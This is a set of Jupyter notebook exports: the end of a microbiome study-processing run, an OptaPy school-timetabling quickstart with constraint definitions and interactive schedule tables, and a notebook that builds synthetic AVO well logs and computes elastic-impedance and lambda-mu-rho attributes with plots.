AmpliconExperiment with 727 samples, 12055 features
**********
../studies/39
['../studies/39/all.biom']
-------------
AmpliconExperiment with 587 samples, 10422 features
**********
../studies/52
['../studies/52/all.biom']
-------------
AmpliconExperiment with 30 samples, 2580 features
**********
../studies/55
['../studies/55/all.biom']
-------------
AmpliconExperiment with 74 samples, 3939 features
**********
../studies/46
['../studies/46/all.biom']
-------------
AmpliconExperiment with 554 samples, 10980 features
**********
../studies/41
['../studies/41/all.biom']
-------------
AmpliconExperiment with 80 samples, 3557 features
**********
../studies/48
['../studies/48/all.biom']
-------------
AmpliconExperiment with 280 samples, 6184 features
**********
../studies/24
['../studies/24/all.biom']
-------------
AmpliconExperiment with 25 samples, 999 features
**********
../studies/23
['../studies/23/all.biom']
-------------
AmpliconExperiment with 114 samples, 1867 features
**********
../studies/4
['../studies/4/all.biom']
-------------
AmpliconExperiment with 82 samples, 1652 features
**********
../studies/15
['../studies/15/all.biom']
-------------
AmpliconExperiment with 162 samples, 2103 features
**********
../studies/3
['../studies/3/all.biom']
-------------
AmpliconExperiment with 334 samples, 3021 features
**********
../studies/12
['../studies/12/all.biom']
-------------
AmpliconExperiment with 224 samples, 13732 features
**********
../studies/49
['../studies/49/all.biom']
-------------
AmpliconExperiment with 263 samples, 8112 features
**********
../studies/40
['../studies/40/all.biom']
-------------
AmpliconExperiment with 85 samples, 3917 features
**********
../studies/47
['../studies/47/all.biom']
-------------
AmpliconExperiment with 247 samples, 7437 features
**********
../studies/2
['../studies/2/all.biom']
-------------
AmpliconExperiment with 179 samples, 2528 features
**********
../studies/13
['../studies/13/all.biom']
-------------
AmpliconExperiment with 31 samples, 925 features
**********
../studies/5
['../studies/5/all.biom']
-------------
AmpliconExperiment with 333 samples, 4664 features
**********
../studies/14
['../studies/14/all.biom']
-------------
AmpliconExperiment with 123 samples, 1271 features
**********
../studies/22
['../studies/22/all.biom']
-------------
AmpliconExperiment with 144 samples, 2687 features
**********
../studies/25
['../studies/25/all.biom']
-------------
AmpliconExperiment with 89 samples, 1781 features
processed 59 studies
###Markdown
Plot the summary stats
###Code
df=pd.read_csv(join(save_dir,'summary.txt'), sep='\t')
df=df.sort_values('median')
f=plt.figure()
plt.bar(np.arange(len(df)),df['median'])
plt.yscale('log')
plt.ylabel('median reads/study')
plt.xlabel('study')
pass
df=df.sort_values('mean')
f=plt.figure()
plt.bar(np.arange(len(df)),df['mean'])
plt.yscale('log')
plt.ylabel('mean reads/study')
plt.xlabel('study')
pass
plt.figure()
plt.hist(df['median'],60)
plt.xlabel('median reads/study')
plt.ylabel('number of studies')
pass
df=df.sort_values('median')
df
###Output
_____no_output_____
###Markdown
Choose the rarefaction depth to work with
###Code
df=df.sort_values('num_rare_4000')
df
###Output
_____no_output_____ |
school-timetabling/school-timetabling-quickstart.ipynb | ###Markdown
OptaPy - OptaPlanner in PythonOptaPy is an **AI constraint solver for Python** to optimize the Vehicle Routing Problem, Employee Rostering, Maintenance Scheduling, Task Assignment, School Timetabling, Cloud Optimization, Conference Scheduling, Job Shop Scheduling, Bin Packing and many more planning problems.OptaPy wraps the [OptaPlanner](https://www.optaplanner.org/) engine internally, but using OptaPy in Python is significantly slower than using OptaPlanner in Java or Kotlin.WARNING: OptaPy is an experimental technology. It is at least 20 times slower than using OptaPlanner in Java or Kotlin. What is OptaPlanner?OptaPlanner is an AI constraint solver. It optimizes planning and scheduling problems, such as the Vehicle Routing Problem, Employee Rostering, Maintenance Scheduling, Task Assignment, School Timetabling, Cloud Optimization, Conference Scheduling, Job Shop Scheduling, Bin Packing and many more. Every organization faces such challenges: assign a limited set of constrained resources (employees, assets, time and/or money) to provide products or services. OptaPlanner delivers more efficient plans, which reduce costs and improve service quality.Constraints apply on plain domain objects and can call existing code. There’s no need to input constraints as mathematical equations. Under the hood, OptaPlanner combines sophisticated Artificial Intelligence optimization algorithms (such as Tabu Search, Simulated Annealing, Late Acceptance and other metaheuristics) with very efficient score calculation and other state-of-the-art constraint solving techniques. An Example: School Timetabling Model the domain objects and constraintsThe goal is to assign each lesson to a time slot and a room. The model is divided into four kinds of objects. Problem Facts: Problem facts are facts about the problem. As such, they do not change during solving (and thus cannot have any planning variables). An example problem fact is shown below:
###Code
from optapy import problem_fact, planning_id
@problem_fact
class Room:
def __init__(self, id, name):
self.id = id
self.name = name
@planning_id
def get_id(self):
return self.id
def __str__(self):
return f"Room(id={self.id}, name={self.name})"
###Output
_____no_output_____
###Markdown
The `@problem_fact` decorator creates a Java class for Room, which allows it to be used in constraints. The `@planning_id` decorator tells OptaPlanner that it can use that method for identifying identical pairs. It is only required if you use `fromUniquePair` on the class in a constraint. The code for the Timeslot problem fact is shown below:
###Code
@problem_fact
class Timeslot:
def __init__(self, id, day_of_week, start_time, end_time):
self.id = id
self.day_of_week = day_of_week
self.start_time = start_time
self.end_time = end_time
@planning_id
def get_id(self):
return self.id
def __str__(self):
return (
f"Timeslot("
f"id={self.id}, "
f"day_of_week={self.day_of_week}, "
f"start_time={self.start_time}, "
f"end_time={self.end_time})"
)
###Output
_____no_output_____
###Markdown
Planning EntitiesDuring a lesson, represented by the Lesson class, a teacher teaches a subject to a group of students, for example, Math by A.Turing for 9th grade or Chemistry by M.Curie for 10th grade. If a subject is taught multiple times per week by the same teacher to the same student group, there are multiple Lesson instances that are only distinguishable by id. For example, the 9th grade has six math lessons a week.During solving, OptaPlanner changes the timeslot and room fields of the Lesson class, to assign each lesson to a time slot and a room. Because OptaPlanner changes these fields, Lesson is a planning entity. Here is how we would write it in Python:
###Code
from optapy import planning_entity, planning_variable
@planning_entity
class Lesson:
def __init__(self, id, subject, teacher, student_group, timeslot=None, room=None):
self.id = id
self.subject = subject
self.teacher = teacher
self.student_group = student_group
self.timeslot = timeslot
self.room = room
@planning_id
def get_id(self):
return self.id
@planning_variable(Timeslot, ["timeslotRange"])
def get_timeslot(self):
return self.timeslot
def set_timeslot(self, new_timeslot):
self.timeslot = new_timeslot
@planning_variable(Room, ["roomRange"])
def get_room(self):
return self.room
def set_room(self, new_room):
self.room = new_room
def __str__(self):
return (
f"Lesson("
f"id={self.id}, "
f"timeslot={self.timeslot}, "
f"room={self.room}, "
f"teacher={self.teacher}, "
f"subject={self.subject}, "
f"student_group={self.student_group}"
f")"
)
###Output
_____no_output_____
###Markdown
The `@planning_entity` decorator creates a Java class for Lesson, which allows it to be used in constraints. The `@planning_variable` decorator specifies that a method returns a planning variable. As such, OptaPlanner will call the corresponding setter to change the value of the variable during solving. It must be named `get%Variable()` and has a corresponding setter `set%Variable` (where `%Variable` is the name of the variable). It takes two parameters:- The first parameter is the type this planning variable takes.- The second parameter, `value_range_provider_refs`, describes where it gets its values from. It is a list of the ids of its value range providers. The ConstraintsThe constraints tell OptaPlanner how good a solution is. Here is how we create the constraints in Python:
###Code
from optapy import constraint_provider, get_class
from optapy.types import Joiners, HardSoftScore
from datetime import datetime, date, timedelta
LessonClass = get_class(Lesson)
RoomClass = get_class(Room)
# Trick since timedelta only works with datetime instances
today = date.today()
def within_30_minutes(lesson1, lesson2):
between = datetime.combine(today, lesson1.timeslot.end_time) - datetime.combine(today, lesson2.timeslot.start_time)
return timedelta(minutes=0) <= between <= timedelta(minutes=30)
@constraint_provider
def define_constraints(constraint_factory):
return [
# Hard constraints
room_conflict(constraint_factory),
teacher_conflict(constraint_factory),
student_group_conflict(constraint_factory),
# Soft constraints
teacher_room_stability(constraint_factory),
teacher_time_efficiency(constraint_factory),
student_group_subject_variety(constraint_factory)
]
def room_conflict(constraint_factory):
# A room can accommodate at most one lesson at the same time.
return constraint_factory \
.forEach(LessonClass) \
.join(LessonClass,
[
# ... in the same timeslot ...
Joiners.equal(lambda lesson: lesson.timeslot),
# ... in the same room ...
Joiners.equal(lambda lesson: lesson.room),
# form unique pairs
Joiners.lessThan(lambda lesson: lesson.id)
]) \
.penalize("Room conflict", HardSoftScore.ONE_HARD)
def teacher_conflict(constraint_factory):
# A teacher can teach at most one lesson at the same time.
return constraint_factory \
.forEach(LessonClass) \
.join(LessonClass,
[
Joiners.equal(lambda lesson: lesson.timeslot),
Joiners.equal(lambda lesson: lesson.teacher),
Joiners.lessThan(lambda lesson: lesson.id)
]) \
.penalize("Teacher conflict", HardSoftScore.ONE_HARD)
def student_group_conflict(constraint_factory):
# A student can attend at most one lesson at the same time.
return constraint_factory \
.forEach(LessonClass) \
.join(LessonClass,
[
Joiners.equal(lambda lesson: lesson.timeslot),
Joiners.equal(lambda lesson: lesson.student_group),
Joiners.lessThan(lambda lesson: lesson.id)
]) \
.penalize("Student group conflict", HardSoftScore.ONE_HARD)
def teacher_room_stability(constraint_factory):
# A teacher prefers to teach in a single room.
return constraint_factory \
.forEach(LessonClass) \
.join(LessonClass,
[
Joiners.equal(lambda lesson: lesson.teacher),
Joiners.lessThan(lambda lesson: lesson.id)
]) \
.filter(lambda lesson1, lesson2: lesson1.room != lesson2.room) \
.penalize("Teacher room stability", HardSoftScore.ONE_SOFT)
def teacher_time_efficiency(constraint_factory):
# A teacher prefers to teach sequential lessons and dislikes gaps between lessons.
return constraint_factory.forEach(LessonClass) \
.join(LessonClass,
[
Joiners.equal(lambda lesson: lesson.teacher),
Joiners.equal(lambda lesson: lesson.timeslot.day_of_week)
]) \
.filter(within_30_minutes) \
.reward("Teacher time efficiency", HardSoftScore.ONE_SOFT)
def student_group_subject_variety(constraint_factory):
# A student group dislikes sequential lessons on the same subject.
return constraint_factory.forEach(LessonClass) \
.join(LessonClass,
[
Joiners.equal(lambda lesson: lesson.subject),
Joiners.equal(lambda lesson: lesson.student_group),
Joiners.equal(lambda lesson: lesson.timeslot.day_of_week)
]) \
.filter(within_30_minutes) \
.penalize("Student group subject variety", HardSoftScore.ONE_SOFT)
###Output
_____no_output_____
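###Markdown
The same stream pattern extends to additional rules. As a purely hypothetical sketch (not part of the original quickstart), an extra soft constraint that discourages early-morning lessons could look like the following; it would also need to be appended to the list returned by `define_constraints`:
###Code
from datetime import time
def no_early_lessons(constraint_factory):
    # Hypothetical extra rule: mildly penalize lessons that start before 09:00.
    return constraint_factory \
        .forEach(LessonClass) \
        .filter(lambda lesson: lesson.timeslot is not None and
                lesson.timeslot.start_time < time(hour=9, minute=0)) \
        .penalize("Early lesson", HardSoftScore.ONE_SOFT)
###Output
_____no_output_____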
###Markdown
The `@constraint_provider` decorator creates a Java `ConstraintProvider` class, allowing OptaPlanner to use it. You can call any Python method when evaluating your constraints. Planning SolutionFinally, there is the planning solution. The planning solution stores references to all the problem facts and planning entities that define the problem. Additionally, it also contains the score of the solution. The planning solution class represents both the problem and the solution; as such, a problem can be viewed as an uninitialized planning solution. Here is how we define it in Python:
###Code
from optapy import planning_solution, planning_entity_collection_property, \
problem_fact_collection_property, \
value_range_provider, planning_score
def format_list(a_list):
return ',\n'.join(map(str, a_list))
@planning_solution
class TimeTable:
def __init__(self, timeslot_list, room_list, lesson_list, score=None):
self.timeslot_list = timeslot_list
self.room_list = room_list
self.lesson_list = lesson_list
self.score = score
def set_student_group_and_teacher_list(self):
self.student_group_list = []
self.teacher_list = []
for lesson in self.lesson_list:
if lesson.teacher not in self.teacher_list:
self.teacher_list.append(lesson.teacher)
if lesson.student_group not in self.student_group_list:
self.student_group_list.append(lesson.student_group)
@problem_fact_collection_property(Timeslot)
@value_range_provider("timeslotRange")
def get_timeslot_list(self):
return self.timeslot_list
@problem_fact_collection_property(Room)
@value_range_provider("roomRange")
def get_room_list(self):
return self.room_list
@planning_entity_collection_property(Lesson)
def get_lesson_list(self):
return self.lesson_list
@planning_score(HardSoftScore)
def get_score(self):
return self.score
def set_score(self, score):
self.score = score
def __str__(self):
return (
f"TimeTable("
f"timeslot_list={format_list(self.timeslot_list)},\n"
f"room_list={format_list(self.room_list)},\n"
f"lesson_list={format_list(self.lesson_list)},\n"
f"score={str(self.score.toString()) if self.score is not None else 'None'}"
f")"
)
###Output
_____no_output_____
###Markdown
The `@planning_solution` decorator creates a Java class for TimeTable, allowing it to be passed to OptaPlanner. The `@problem_fact_collection_property` decorator tells OptaPlanner that the method returns problem facts (it takes in one required argument: the Python class of the problem fact). Similarly, the `@planning_entity_collection_property` decorator tells OptaPlanner that the method returns planning entities (it takes in one required argument: the Python class of the planning entity). The `@value_range_provider` decorator tells OptaPlanner that the method provides values for planning variables. Its `range_id` parameter is used to determine which planning variable(s) accept values from it. For example, `timeslot` takes values from the `timeslotRange`, so it accepts values from `get_timeslot_list`. Finally, the `@planning_score` decorator tells OptaPlanner the method returns the planning score (how good the solution is). Like with `@planning_variable`, it must be named `get%Score()` and has a corresponding setter `set%Score` (where `%Score` is the name of the score). Its parameter tells OptaPlanner what kind of score it takes. SolvingNow that we have defined our model and constraints, let's create an instance of the problem:
###Code
from datetime import time
def generate_problem():
timeslot_list = [
Timeslot(1, "MONDAY", time(hour=8, minute=30), time(hour=9, minute=30)),
Timeslot(2, "MONDAY", time(hour=9, minute=30), time(hour=10, minute=30)),
Timeslot(3, "MONDAY", time(hour=10, minute=30), time(hour=11, minute=30)),
Timeslot(4, "MONDAY", time(hour=13, minute=30), time(hour=14, minute=30)),
Timeslot(5, "MONDAY", time(hour=14, minute=30), time(hour=15, minute=30)),
Timeslot(6, "TUESDAY", time(hour=8, minute=30), time(hour=9, minute=30)),
Timeslot(7, "TUESDAY", time(hour=9, minute=30), time(hour=10, minute=30)),
Timeslot(8, "TUESDAY", time(hour=10, minute=30), time(hour=11, minute=30)),
Timeslot(9, "TUESDAY", time(hour=13, minute=30), time(hour=14, minute=30)),
Timeslot(10, "TUESDAY", time(hour=14, minute=30), time(hour=15, minute=30)),
]
room_list = [
Room(1, "Room A"),
Room(2, "Room B"),
Room(3, "Room C")
]
lesson_list = [
Lesson(1, "Math", "A. Turing", "9th grade"),
Lesson(2, "Math", "A. Turing", "9th grade"),
Lesson(3, "Physics", "M. Curie", "9th grade"),
Lesson(4, "Chemistry", "M. Curie", "9th grade"),
Lesson(5, "Biology", "C. Darwin", "9th grade"),
Lesson(6, "History", "I. Jones", "9th grade"),
Lesson(7, "English", "I. Jones", "9th grade"),
Lesson(8, "English", "I. Jones", "9th grade"),
Lesson(9, "Spanish", "P. Cruz", "9th grade"),
Lesson(10, "Spanish", "P. Cruz", "9th grade"),
Lesson(11, "Math", "A. Turing", "10th grade"),
Lesson(12, "Math", "A. Turing", "10th grade"),
Lesson(13, "Math", "A. Turing", "10th grade"),
Lesson(14, "Physics", "M. Curie", "10th grade"),
Lesson(15, "Chemistry", "M. Curie", "10th grade"),
Lesson(16, "French", "M. Curie", "10th grade"),
Lesson(17, "Geography", "C. Darwin", "10th grade"),
Lesson(18, "History", "I. Jones", "10th grade"),
Lesson(19, "English", "P. Cruz", "10th grade"),
Lesson(20, "Spanish", "P. Cruz", "10th grade"),
]
lesson = lesson_list[0]
lesson.set_timeslot(timeslot_list[0])
lesson.set_room(room_list[0])
return TimeTable(timeslot_list, room_list, lesson_list)
###Output
_____no_output_____
###Markdown
and solve it:
###Code
from optapy import solver_manager_create
from optapy.types import SolverConfig, Duration
from tango import pick_color
from ipywidgets import Tab
from ipysheet import sheet, cell, row, column, cell_range
solver_config = SolverConfig().withEntityClasses(get_class(Lesson)) \
.withSolutionClass(get_class(TimeTable)) \
.withConstraintProviderClass(get_class(define_constraints)) \
.withTerminationSpentLimit(Duration.ofSeconds(30))
solution = generate_problem()
solution.set_student_group_and_teacher_list()
cell_map = dict()
def on_best_solution_changed(best_solution):
global timetable
global solution
global cell_map
solution = best_solution
unassigned_lessons = []
clear_cell_set = set()
for (table_name, table_map) in cell_map.items():
for (key, cell) in table_map.items():
clear_cell_set.add(cell)
for lesson in solution.lesson_list:
if lesson.timeslot is None or lesson.room is None:
            unassigned_lessons.append(lesson)
else:
update_lesson_in_table(lesson, clear_cell_set)
for cell in clear_cell_set:
cell.value = ""
cell.style["backgroundColor"] = "white"
for (table_name, table_map) in cell_map.items():
for (key, cell) in table_map.items():
cell.send_state()
def update_lesson_in_table(lesson, clear_cell_set):
global cell_map
x = solution.timeslot_list.index(lesson.timeslot)
room_column = solution.room_list.index(lesson.room)
teacher_column = solution.teacher_list.index(lesson.teacher)
student_group_column = solution.student_group_list.index(lesson.student_group)
color = pick_color(lesson.subject)
room_cell = cell_map['room'][(x, room_column)]
teacher_cell = cell_map['teacher'][(x, teacher_column)]
student_group_cell = cell_map['student_group'][(x, student_group_column)]
clear_cell_set.discard(room_cell)
clear_cell_set.discard(teacher_cell)
clear_cell_set.discard(student_group_cell)
room_cell.value = f"{lesson.subject}\n{lesson.teacher}\n{lesson.student_group}"
room_cell.style["backgroundColor"] = color
room_cell.send_state()
teacher_cell.value = f"{lesson.room.name}\n{lesson.subject}\n{lesson.student_group}"
teacher_cell.style["backgroundColor"] = color
teacher_cell.send_state()
student_group_cell.value = f"{lesson.room.name}\n{lesson.subject}\n{lesson.teacher}"
student_group_cell.style["backgroundColor"] = color
student_group_cell.send_state()
def create_table(table_name, solution, columns, name_map):
global cell_map
out = sheet(rows=len(solution.timeslot_list) + 1, columns=len(columns) + 1)
header_color = "#22222222"
cell(0,0, read_only=True, background_color=header_color)
header_row = row(0, list(map(name_map, columns)), column_start=1, read_only=True,
background_color=header_color)
timeslot_column = column(0,
list(map(lambda timeslot: timeslot.day_of_week[0:3] + " " + str(timeslot.start_time)[0:10],
solution.timeslot_list)), row_start=1, read_only=True, background_color=header_color)
table_cells = dict()
cell_map[table_name] = table_cells
for x in range(len(solution.timeslot_list)):
for y in range(len(columns)):
table_cells[(x, y)] = cell(x + 1, y + 1, "", read_only=True)
return out
solver_manager = solver_manager_create(solver_config)
by_room_table = create_table('room', solution, solution.room_list, lambda room: room.name)
by_teacher_table = create_table('teacher', solution, solution.teacher_list, lambda teacher: teacher)
by_student_group_table = create_table('student_group', solution, solution.student_group_list,
lambda student_group: student_group)
solver_manager.solveAndListen(0, lambda the_id: solution, on_best_solution_changed)
tab = Tab()
tab.children = [by_room_table, by_teacher_table, by_student_group_table]
tab.set_title(0, 'By Room')
tab.set_title(1, 'By Teacher')
tab.set_title(2, 'By Student Group')
tab
###Output
_____no_output_____ |
1_synthetic/4_avo_synthetic.ipynb | ###Markdown
Compute the elastic impedance, the normalized elastic impedance and the lambda-rho / mu-rho (LMR) attributes
###Code
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import impedance as ip
%matplotlib inline
###Output
_____no_output_____
###Markdown
Elastic properties for AVO classesThe cell below defines the elastic properties for AVO classes compiled by [Alessandro del Monte](http://nbviewer.ipython.org/github/aadm/geophysical_notes/blob/master/avo_explorer_v2_mono.ipynb). Originally, Class IV is from Castagna & Swan (1997) "Principles of AVO crossplotting" and the others from Hilterman (2001) "Seismic Amplitude Interpretation".
###Code
shale = np.array([[3094,1515,2.40], [2643,1167,2.29], [2192,818,2.16], [3240,1620,2.34]])
sandgas = np.array([[4050,2526,2.21], [2781,1665,2.08], [1542,901,1.88], [1650,1090,2.07]])
sandbrine = np.array([[4115,2453,2.32], [3048,1595,2.23], [2134,860,2.11], [2590,1060,2.21]])
avocl=['Class I','Class II','Class III','Class IV']
angle = 30
###Output
_____no_output_____
###Markdown
The properties will generate the logs
###Code
faceis_vet = np.zeros(5)
vp=np.zeros(5) + shale[0,0]
vs = np.zeros(5) + shale[0,1]
rho = np.zeros(5) + shale[0,2]
for i in range (len(avocl)):
vp1 = np.zeros(100) + shale[i,0] #m/s
vs1 = np.zeros(100) + shale[i,1]
rho1 = np.zeros(100) + shale[i,2] #g/cc
faceis_vet1 = np.zeros(100)
vp2 = np.zeros(100) + sandgas[i,0]
vs2 = np.zeros(100) + sandgas[i,1] #m/s
rho2 = np.zeros(100) + sandgas[i,2] #g/cc
faceis_vet2 = np.zeros(100) + 1
vp3 = np.zeros(100) + sandbrine[i,0]
vs3 = np.zeros(100) + sandbrine[i,1] #m/s
rho3 = np.zeros(100) + sandbrine[i,2] #g/cc
faceis_vet3 = np.zeros(100) + 2
vp=np.concatenate((vp,vp1,vp2,vp1,vp3))
vs=np.concatenate((vs,vs1,vs2,vs1,vs3))
rho=np.concatenate((rho,rho1,rho2,rho1,rho3))
faceis_vet=np.concatenate((faceis_vet,faceis_vet1,faceis_vet2,faceis_vet1,faceis_vet3))
vp += np.random.normal(0, np.max(np.abs(vp))*0.005, len(vp))
vs += np.random.normal(0, np.max(np.abs(vs))*0.005, len(vs))
rho += np.random.normal(0, np.max(np.abs(rho))*0.005, len(rho))
vpvs=vp/vs
#poisson ratio
pr=0.5*((vpvs**2-2)/(vpvs**2-1))
ai=ip.ai(vp,rho) # acoustic impedance
ei=ip.ei(vp,vs,rho,angle) # elastic impedance
nei=ip.nei(vp,vs,rho,shale[2,0],shale[2,1],shale[2,2],angle) # normalized elastic impedance
lambda_rho,mu_rho=ip.lrm(vp,vs,rho) # lambda rho and mu rho
###Output
_____no_output_____
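###Markdown
The `impedance` module used above is local to this repository and its source is not shown here. For reference, a minimal sketch of what such helpers conventionally compute — assuming the standard definitions of Connolly (1999) for elastic impedance, Whitcombe (2002) for the normalized form, and Goodway et al. (1997) for lambda-rho / mu-rho — looks like this:
###Code
def ai_sketch(vp, rho):
    # Acoustic impedance
    return vp * rho

def ei_sketch(vp, vs, rho, angle):
    # Connolly (1999) elastic impedance; K is the average (Vs/Vp)^2
    t = np.radians(angle)
    k = np.mean(vs**2 / vp**2)
    return vp**(1 + np.tan(t)**2) * vs**(-8 * k * np.sin(t)**2) * rho**(1 - 4 * k * np.sin(t)**2)

def nei_sketch(vp, vs, rho, vp0, vs0, rho0, angle):
    # Whitcombe (2002) normalized elastic impedance, scaled so that it has AI units
    t = np.radians(angle)
    k = np.mean(vs**2 / vp**2)
    return vp0 * rho0 * ((vp / vp0)**(1 + np.tan(t)**2)
                         * (vs / vs0)**(-8 * k * np.sin(t)**2)
                         * (rho / rho0)**(1 - 4 * k * np.sin(t)**2))

def lrm_sketch(vp, vs, rho):
    # Goodway et al. (1997): lambda*rho and mu*rho from P- and S-impedance
    ip_p, ip_s = vp * rho, vs * rho
    return ip_p**2 - 2 * ip_s**2, ip_s**2
###Output
_____no_output_____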
###Markdown
Plot the logs - the tops of the gas sands are in red
###Code
fig=plt.figure(figsize=(12,15))
ax=plt.subplot(2,5,1)
plt.title('vp',fontsize=13)
plt.plot(vp,np.arange(vp.shape[0]))
ax.invert_yaxis()
plt.hlines(105,np.min(vp),np.max(vp),colors='r',alpha=0.6)
plt.hlines(505,np.min(vp),np.max(vp),colors='r',alpha=0.6)
plt.hlines(905,np.min(vp),np.max(vp),colors='r',alpha=0.6)
plt.hlines(1305,np.min(vp),np.max(vp),colors='r',alpha=0.6)
plt.grid(True)
ax=plt.subplot(2,5,2)
plt.title('vs',fontsize=13)
plt.plot(vs,np.arange(vs.shape[0]))
ax.invert_yaxis()
plt.hlines(105,np.min(vs),np.max(vs),colors='r',alpha=0.6)
plt.hlines(505,np.min(vs),np.max(vs),colors='r',alpha=0.6)
plt.hlines(905,np.min(vs),np.max(vs),colors='r',alpha=0.6)
plt.hlines(1305,np.min(vs),np.max(vs),colors='r',alpha=0.6)
plt.grid(True)
ax=plt.subplot(2,5,3)
plt.title('rho',fontsize=13)
plt.plot(rho,np.arange(rho.shape[0]))
ax.invert_yaxis()
plt.hlines(105,np.min(rho),np.max(rho),colors='r',alpha=0.6)
plt.hlines(505,np.min(rho),np.max(rho),colors='r',alpha=0.6)
plt.hlines(905,np.min(rho),np.max(rho),colors='r',alpha=0.6)
plt.hlines(1305,np.min(rho),np.max(rho),colors='r',alpha=0.6)
plt.grid(True)
ax=plt.subplot(2,5,4)
plt.title('vp/vs',fontsize=13)
plt.plot(vpvs,np.arange(vpvs.shape[0]))
ax.invert_yaxis()
plt.hlines(105,np.min(vpvs),np.max(vpvs),colors='r',alpha=0.6)
plt.hlines(505,np.min(vpvs),np.max(vpvs),colors='r',alpha=0.6)
plt.hlines(905,np.min(vpvs),np.max(vpvs),colors='r',alpha=0.6)
plt.hlines(1305,np.min(vpvs),np.max(vpvs),colors='r',alpha=0.6)
plt.grid(True)
ax=plt.subplot(2,5,5)
plt.title('poisson ratio',fontsize=13)
plt.plot(pr,np.arange(pr.shape[0]))
ax.invert_yaxis()
plt.hlines(105,np.min(pr),np.max(pr),colors='r',alpha=0.6)
plt.hlines(505,np.min(pr),np.max(pr),colors='r',alpha=0.6)
plt.hlines(905,np.min(pr),np.max(pr),colors='r',alpha=0.6)
plt.hlines(1305,np.min(pr),np.max(pr),colors='r',alpha=0.6)
plt.grid(True)
ax=plt.subplot(2,5,6)
plt.title(r'$\lambda\rho - \mu\rho$',fontsize=13)
plt.plot(lambda_rho,np.arange(lambda_rho.shape[0]),label=r'$\lambda\rho$',color='darkblue')
plt.plot(mu_rho,np.arange(mu_rho.shape[0]),label=r'$\mu\rho$',color='darkgreen')
ax.invert_yaxis()
plt.legend(loc='lower left')
plt.hlines(105,np.min(mu_rho),np.max(mu_rho),colors='r',alpha=0.6)
plt.hlines(505,np.min(mu_rho),np.max(mu_rho),colors='r',alpha=0.6)
plt.hlines(905,np.min(mu_rho),np.max(mu_rho),colors='r',alpha=0.6)
plt.hlines(1305,np.min(mu_rho),np.max(mu_rho),colors='r',alpha=0.6)
plt.grid(True)
ax=plt.subplot(2,5,7)
plt.title('AI',fontsize=13)
plt.plot(ai,np.arange(ai.shape[0]),color='darkblue')
ax.invert_yaxis()
plt.hlines(105,np.min(ai),np.max(ai),colors='r',alpha=0.6)
plt.hlines(505,np.min(ai),np.max(ai),colors='r',alpha=0.6)
plt.hlines(905,np.min(ai),np.max(ai),colors='r',alpha=0.6)
plt.hlines(1305,np.min(ai),np.max(ai),colors='r',alpha=0.6)
plt.grid(True)
ax=plt.subplot(2,5,8)
plt.title('EI',fontsize=13)
plt.plot(ei,np.arange(ei.shape[0]),color='darkgreen')
ax.invert_yaxis()
plt.hlines(105,np.min(ei),np.max(ei),colors='r',alpha=0.6)
plt.hlines(505,np.min(ei),np.max(ei),colors='r',alpha=0.6)
plt.hlines(905,np.min(ei),np.max(ei),colors='r',alpha=0.6)
plt.hlines(1305,np.min(ei),np.max(ei),colors='r',alpha=0.6)
plt.grid(True)
ax=plt.subplot(2,5,9)
plt.title('NEI',fontsize=13)
plt.plot(nei,np.arange(nei.shape[0]),color='darkorange')
ax.invert_yaxis()
plt.hlines(105,np.min(nei),np.max(nei),colors='r',alpha=0.6)
plt.hlines(505,np.min(nei),np.max(nei),colors='r',alpha=0.6)
plt.hlines(905,np.min(nei),np.max(nei),colors='r',alpha=0.6)
plt.hlines(1305,np.min(nei),np.max(nei),colors='r',alpha=0.6)
plt.grid(True)
ax=plt.subplot(2,5,10)
plt.title('AI - EI - NEI',fontsize=13)
plt.plot(ai,np.arange(ai.shape[0]),label='ai',color='darkblue')
plt.plot(ei,np.arange(ei.shape[0]),label='ei',color='darkgreen')
plt.plot(nei,np.arange(nei.shape[0]),label='nei',color='darkorange')
plt.legend(loc='center left', bbox_to_anchor=(1, 0.5))
ax.invert_yaxis()
plt.hlines(105,np.min(ei),np.max(ei),colors='r',alpha=0.6)
plt.hlines(505,np.min(ei),np.max(ei),colors='r',alpha=0.6)
plt.hlines(905,np.min(ei),np.max(ei),colors='r',alpha=0.6)
plt.hlines(1305,np.min(ei),np.max(ei),colors='r',alpha=0.6)
plt.grid(True)
plt.tight_layout()
###Output
_____no_output_____
###Markdown
Crossplots
###Code
#colormap from del Monte (2015)
# 0=brine 1=gas 2=shale
ccc = ['blue','red','green']
cmap_facies = colors.ListedColormap(ccc[0:len(ccc)], 'indexed')
fig=plt.figure(figsize=(16,6))
ax=plt.subplot(2,4,1)
plt.scatter(vp,rho,20,c=faceis_vet,cmap=cmap_facies)
ax.set_xlabel('Vp (m/s)')
ax.set_ylabel('Rhob (g/cc)')
plt.grid()
cbar=plt.colorbar(pad=0)
cbar.set_label((15*' ').join(['shale', 'gas', 'brine']))
cbar.set_ticks(range(0,1)); cbar.set_ticklabels('')
ax=plt.subplot(2,4,2)
plt.scatter(vp,vs,20,c=faceis_vet,cmap=cmap_facies)
ax.set_xlabel('Vp (m/s)')
ax.set_ylabel('Vs (m/s)')
plt.grid()
cbar=plt.colorbar(pad=0)
cbar.set_label((15*' ').join(['shale', 'gas', 'brine']))
cbar.set_ticks(range(0,1)); cbar.set_ticklabels('')
ax=plt.subplot(2,4,3)
plt.scatter(vs,vpvs,20,c=faceis_vet,cmap=cmap_facies)
ax.set_xlabel('Vs (km/s)')
ax.set_ylabel('Vp/Vs')
plt.grid()
cbar=plt.colorbar(pad=0)
cbar.set_label((15*' ').join(['shale', 'gas', 'brine']))
cbar.set_ticks(range(0,1)); cbar.set_ticklabels('')
ax=plt.subplot(2,4,4)
plt.scatter(lambda_rho,mu_rho,20,c=faceis_vet,cmap=cmap_facies)
ax.set_xlabel(r'$\lambda\rho (g^2/cc^2 x m^2/s^2)$')
ax.set_ylabel(r'$\mu\rho (g^2/cc^2 x m^2/s^2)$')
plt.grid()
cbar=plt.colorbar(pad=0)
cbar.set_label((15*' ').join(['shale', 'gas', 'brine']))
cbar.set_ticks(range(0,1)); cbar.set_ticklabels('')
ax=plt.subplot(2,4,5)
plt.scatter(ai,vpvs,20,c=faceis_vet,cmap=cmap_facies)
ax.set_xlabel('AI (g/cc x m/s)')
ax.set_ylabel('Vp/Vs')
plt.grid()
cbar=plt.colorbar(pad=0)
cbar.set_label((15*' ').join(['shale', 'gas', 'brine']))
cbar.set_ticks(range(0,1)); cbar.set_ticklabels('')
ax=plt.subplot(2,4,6)
plt.scatter(nei,vpvs,20,c=faceis_vet,cmap=cmap_facies)
ax.set_xlabel('NEI (g/cc x m/s)')
ax.set_ylabel('Vp/Vs')
plt.grid()
cbar=plt.colorbar(pad=0)
